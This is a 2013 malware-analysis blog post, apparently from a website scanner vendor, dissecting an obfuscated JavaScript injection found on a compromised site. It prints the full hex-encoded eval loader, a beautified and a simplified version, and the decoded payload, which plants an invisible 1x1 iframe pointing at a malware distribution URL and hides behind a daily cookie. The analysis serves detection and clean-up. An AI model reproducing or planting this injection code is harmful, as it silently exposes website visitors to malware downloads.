Thursday, April 18, 2013

Malicious JavaScript generates hidden iframe to malware distributor

Obfuscated malicious JavaScript code generates a hidden iframe to load content from a remote malicious domain

Background

Online Website Malware Scanner has identified malicious JavaScript code injected into website pages. Such obfuscated JavaScript code is used to build a malicious iframe that is invisible to the website visitor and to redirect the web browser to a remote malware distributor. This infected website hosts suspicious JavaScript code injected into a file. As discussed in other posts about malicious iframe generation, the attack flow is very similar and contains multiple levels of obfuscation intended to evade detection mechanisms.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Website malware scanner report

Submission date: Wed Apr 17 20:17:53 2013
Infected website's files: 1
Website malware scan report link: http://goo.gl/D5PF8


Website malware scanner report


Malicious JavaScript injection detected


Threat dump:
[[                                                                                                                                                                                                                                                          aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,66,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,66,6c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5c,61,5f,61,6c,59,64,65,5d,5c,61,59,6a,5d,6b,67,6d,6a,5b,5d,26,5b,67,65,27,64,67,5b,59,64,6b,5d,59,6a,5b,60,65,59,6a,63,5d,6c,61,66,5f,6c,70,26,5b,67,65,27,5d,6b,5c,26,68,60,68,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,66,6c,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,66,6c,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,
71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5
d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");}w=f;s=[];if(window.document)for(i=2-2;-i+1397!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+8);}xz=e;if(window.document)xz(s)}]]


Malware entry


Malware entry details.

Beautified script


  // Obfuscated loader stage (beautified from the threat dump above).
  // It rebuilds the real payload from a comma-separated list of hex byte
  // values, adds 8 to each value, and passes the resulting string to eval();
  // the decoded result is the iframe payload listed further down the page.
  1. aq = "0x";                        // hex prefix prepended to every list element before eval()
  2. ff = String;
  3. fff = "fromCh" + "a" + "rCode";   // spliced so a plain search for "fromCharCode" does not match
  4. ff = ff[fff];                     // ff === String.fromCharCode
  5. zz = 3;                           // never read; filler
  6. try {
  7.     document.body ^= ~1;          // NOTE(review): in a real browser this assignment is expected to throw (the document.body setter rejects a non-element value), so the catch branch below is the normal path and an emulator where it does not throw never reaches the payload — confirm per engine
  8. } catch (z1z1) {
  9.     v = 123;                      // never read; filler
  10.     vzs = 0;
  11.     try {
  12.         document;                // throws in environments with no `document` global
  13.     } catch (q) {
  14.         vzs = 1;
  15.     }
  16.     if (!vzs) e = eval;          // eval is aliased only when `document` exists: a second anti-analysis gate
  17.     if (1) {
  // f: array of two-digit hex strings, one per character of the decoded payload.
  // The string literal is wrapped across the next lines in this rendering.
  18.         f ="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,66,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,66,6c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5c,61,5f,61,6c,59,64,65,5d,5c,61,59,6a,5d,6b,67,6d,6a,5b,5d,26,5b,67,65,27,64,67,5b,59,64,6b,5d,59,6a,5b,60,65,59,6a,63,5d,6c,61,66,5f,6c,70,26,5b,67,65,27,5d,6b,5c,26,68,60,68,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,68,67,6b,61,6c,61,67,66,18,35,18,1f,59,5a,6b,67,64,6d,6c,5d,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,5a,67,6a,5c,5d,6a,18,35,18,1f,28,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,60,5d,61,5f,60,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6f,61,5c,6c,60,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,64,5d,5e,6c,18,35,18,1f,29,68,70,1f,33,5,2,18,18,18,18,66,6c,26,6b,6c,71,64,5d,26,6c,67,68,18,35,18,1f,29,68,70,1f,33,5,2,5,2,18,18,18,18,61,5e,18,20,19,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,21,18,73,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,6f,6a,61,6c,5d,20,1f,34,5c,61,6e,18,61,5c,35,54,1f,66,6c,54,1f,36,34,27,5c,61,6e,36,1f,21,33,5,2,18,18,18,18,18,18,18,18,5c,67,5b,6d,65,5d,66,6c,26,5f,5d,6c,3d,64,5d,65,5d,66,6c,3a,71,41,5c,20,1f,66,6c,1f,21,26,59,68,68,5d,66,5c,3b,60,61,64,5c,20,66,6c,21,33,5,2,18,18,18,18,75,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,4b,5d,6c,3b,67,67,63,61,5d,20,5b,67,67,63,61,5d,46,59,65,5d,24,5b,67,67,63,61,5d,4e,59,64,6d,5d,24,66,3c,59,71,6b,24,68,59,6c,60,21,18,73,5,2,18,6e,59,6a,18,6c,67,5c,59,71,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,6e,59,6a,18,5d,70,68,61,6a,5d,18,35,18,66,5d,6f,18,3c,59,6c,5d,20,21,33,5,2,18,61,5e,18,20,66,3c,59,71,6b,35,35,66,6d,64,64,18,74,74,18,66,3c,59,71,6b,35,35,28,21,18,66,3c,59,71,6b,35,29,33,5,2,18,5d,70,68,61,6a,5d,26,6b,5d,6c,4c,61,65,5d,20,6c,67,5c,59,71,26,5f,5d,6c,4c,61,65,5d,
  20,21,18,23,18,2b,2e,28,28,28,28,28,22,2a,2c,22,66,3c,59,71,6b,21,33,5,2,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,18,35,18,5b,67,67,63,61,5d,46,59,65,5d,23,1a,35,1a,23,5d,6b,5b,59,68,5d,20,5b,67,67,63,61,5d,4e,59,64,6d,5d,21,5,2,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,23,18,1a,33,5d,70,68,61,6a,5d,6b,35,1a,18,23,18,5d,70,68,61,6a,5d,26,6c,67,3f,45,4c,4b,6c,6a,61,66,5f,20,21,18,23,18,20,20,68,59,6c,60,21,18,37,18,1a,33,18,68,59,6c,60,35,1a,18,23,18,68,59,6c,60,18,32,18,1a,1a,21,33,5,2,75,5,2,5e,6d,66,5b,6c,61,67,66,18,3f,5d,6c,3b,67,67,63,61,5d,20,18,66,59,65,5d,18,21,18,73,5,2,18,6e,59,6a,18,6b,6c,59,6a,6c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,66,59,65,5d,18,23,18,1a,35,1a,18,21,33,5,2,18,6e,59,6a,18,64,5d,66,18,35,18,6b,6c,59,6a,6c,18,23,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,23,18,29,33,5,2,18,61,5e,18,20,18,20,18,19,6b,6c,59,6a,6c,18,21,18,1e,1e,5,2,18,20,18,66,59,65,5d,18,19,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,28,24,18,66,59,65,5d,26,64,5d,66,5f,6c,60,18,21,18,21,18,21,5,2,18,73,5,2,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,75,5,2,18,61,5e,18,20,18,6b,6c,59,6a,6c,18,35,35,18,25,29,18,21,18,6a,5d,6c,6d,6a,66,18,66,6d,64,64,33,5,2,18,6e,59,6a,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,61,66,5c,5d,70,47,5e,20,18,1a,33,1a,24,18,64,5d,66,18,21,33,5,2,18,61,5e,18,20,18,5d,66,5c,18,35,35,18,25,29,18,21,18,5d,66,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,64,5d,66,5f,6c,60,33,5,2,18,6a,5d,6c,6d,6a,66,18,6d,66,5d,6b,5b,59,68,5d,20,18,5c,67,5b,6d,65,5d,66,6c,26,5b,67,67,63,61,5d,26,6b,6d,5a,6b,6c,6a,61,66,5f,20,18,64,5d,66,24,18,5d,66,5c,18,21,18,21,33,5,2,75,5,2,61,5e,18,20,66,59,6e,61,5f,59,6c,67,6a,26,5b,67,67,63,61,5d,3d,66,59,5a,64,5d,5c,21,5,2,73,5,2,61,5e,20,3f,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6c,5d,5c,57,6d,69,1f,21,35,35,2d,2d,21,73,75,5d,64,6b,5d,73,4b,5d,6c,3b,67,67,63,61,5d,20,1f,6e,61,6b,61,6
  c,5d,5c,57,6d,69,1f,24,18,1f,2d,2d,1f,24,18,1f,29,1f,24,18,1f,27,1f,21,33,5,2,5,2,72,72,72,5e,5e,5e,20,21,33,5,2,75,5,2,75"["split"](",");
  19.     }
  20.     w = f;
  21.     s = [];                      // starts as an empty array; `[] + string` coerces it to "" on the first append, so s ends up a string
  // NOTE(review): the loop variable was lost in this rendering; the threat dump
  // above reads for(i=2-2;-i+1397!=0;i+=1), i.e. i runs from 0 to 1396
  // (1397 presumably equals f.length — not verified here).
  22.     if (window.document) for (= 2 - 2; - i + 1397 != 0; i += 1) {
  23.             j = i;
  // 031 is octal 25 and 0x19 is 25, so the guard is always true. Each element is
  // evaluated as a hex number and shifted by +8 before becoming a character.
  24.             if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 8);
  25.     }
  26.     xz = e;
  27.     if (window.document) xz(s)   // eval(s): executes the decoded payload
  28. }


Simplified version of malicious JavaScript code injection


  // Simplified (analyst-rewritten) form of the loader above: decode the hex
  // list into a string, then execute it.
  // NOTE(review): the identifier on line 1 and the loop variable on line 3 were
  // lost in this rendering; the beautified listing above assigns the list to `f`
  // and loops with `i`. The middle of the hex list is elided ("...").
  1. = "5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,...75,5,2,75" ["split"](",");
  2. s=""
  3. for (= 2 - 2; - i + 1397 != 0; i += 1){ s = s + String.fromCharCode(eval("0x" + (f[i])) + 8);}   // each character = hex value + 8
  4. eval(s);   // runs the decoded iframe payload shown below


Malicious payload


The decoded payload generates a hidden iframe pointing to http://digitalmediaresource[.]com/localsearchmarketingtx.com/esd.php



  // Decoded payload. zzzfff() builds a 1x1 px, borderless, absolutely positioned
  // iframe pointing at the remote distributor and appends it to a <div id="nt">
  // written into the page. The two cookie helpers limit the injection to once
  // per visitor per day (cookie `visited_uq`, value 55, 1-day expiry), so a
  // returning visitor — or an analyst reloading the page — does not see the
  // frame again until the cookie expires.
  // Detection hints: an absolutely positioned 1px iframe, a div with id "nt"
  // added via document.write, and a `visited_uq` cookie.
  1. function zzzfff() {
  2.     var nt = document.createElement('iframe');
  3.     nt.src = 'http://digitalmediaresource.com/localsearchmarketingtx.com/esd.php';   // remote malware distributor (see the defanged URL above)
  4.     nt.style.position = 'absolute';
  5.     nt.style.border = '0';
  6.     nt.style.height = '1px';   // 1x1 px at offset (1px, 1px): effectively invisible to the visitor
  7.     nt.style.width = '1px';
  8.     nt.style.left = '1px';
  9.     nt.style.top = '1px';
  10.     if (!document.getElementById('nt')) {   // inject only once per page
  11.         document.write('<div id=\'nt\'></div>');
  12.         document.getElementById('nt').appendChild(nt);
  13.     }
  14. }
  // Writes a cookie that expires nDays days from now; nDays falls back to 1 when
  // it is null or 0. The value is escape()d and an optional path is appended.
  15. function SetCookie(cookieName,cookieValue,nDays,path) {
  16.  var today = new Date();
  17.  var expire = new Date();
  18.  if (nDays==null || nDays==0) nDays=1;
  19.  expire.setTime(today.getTime() + 3600000*24*nDays);   // nDays * 24h in ms; the caller below passes the string '1', which coerces to 1 day
  20.  document.cookie = cookieName+"="+escape(cookieValue)
  21.                  + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // Returns the unescape()d value of cookie `name`, or null when it is absent.
  23. function GetCookie( name ) {
  24.         var start = document.cookie.indexOf( name + "=" );
  25.         var len = start + name.length + 1;   // index of the first character of the value
  // Only true when start == 0 and the cookie string does not begin with `name`;
  // both cannot hold at once, so this branch is effectively dead.
  26.         if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) )
  27.         {
  28.                 return null;
  29.         }
  30.        
  31.         if ( start == -1 ) return null;
  32.         var end = document.cookie.indexOf( ";", len );
  33.         if ( end == -1 ) end = document.cookie.length;   // last cookie in the string has no trailing ';'
  34.                 return unescape( document.cookie.substring( len, end ) );
  35. }
  // Trigger: inject the frame only when the marker cookie is absent, then set it
  // for one day on path '/'. GetCookie() returns the string '55'; the loose `==`
  // makes it compare equal to the number 55. Nothing runs when cookies are disabled.
  36. if (navigator.cookieEnabled)
  37. {
  38.         if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
  39.         zzzfff();
  40. }
  41. }



Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.

1 comment:

  1. Another website infected with the same injection was detected by the online scanner.

    Link to malware report: http://quttera.com/detailed_report/www.carloratto.com

    Submitted by online users on: Thu Apr 18 12:04:55 2013
